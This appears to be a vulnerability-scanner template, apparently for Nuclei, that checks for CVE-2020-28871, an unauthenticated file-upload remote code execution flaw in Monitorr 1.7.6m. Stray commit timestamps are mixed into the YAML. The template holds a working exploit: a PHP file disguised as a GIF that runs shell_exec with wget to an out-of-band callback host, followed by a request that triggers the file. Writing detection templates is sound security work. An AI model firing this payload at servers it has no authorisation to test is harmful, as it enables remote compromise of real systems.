2021-07-20 06:03:16 +00:00
id: CVE-2020-28871
2021-07-19 23:20:18 +00:00
info:
  name: Monitorr 1.7.6m - Unauthenticated Remote Code Execution
  author: gy741
  severity: critical
  description: This template detects a remote code execution vulnerability in Monitorr 1.7.6m. Improper input validation and a lack of authorization lead to arbitrary file upload in the web application. An unauthorized attacker with web access to the application could upload and execute a specially crafted file, leading to remote code execution within Monitorr.
2021-08-18 11:37:49 +00:00
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-28871
    - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
    - https://www.exploit-db.com/exploits/48980
  tags: cve,cve2020,monitorr,rce,oob

requests:
  - raw:
      - |
        POST /assets/php/upload.php HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept: text/plain, */*; q=0.01
        Connection: close
        Accept-Language: en-US,en;q=0.5
        X-Requested-With: XMLHttpRequest
        Content-Type: multipart/form-data; boundary=---------------------------31046105003900160576454225745
        Origin: http://{{Hostname}}
        Referer: http://{{Hostname}}

        -----------------------------31046105003900160576454225745
        Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php"
        Content-Type: image/gif

        GIF89a213213123<?php shell_exec("wget -c http://{{interactsh-url}}");

        -----------------------------31046105003900160576454225745--

      - |
        GET /assets/data/usrimg/{{tolower("{{randstr}}.php")}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"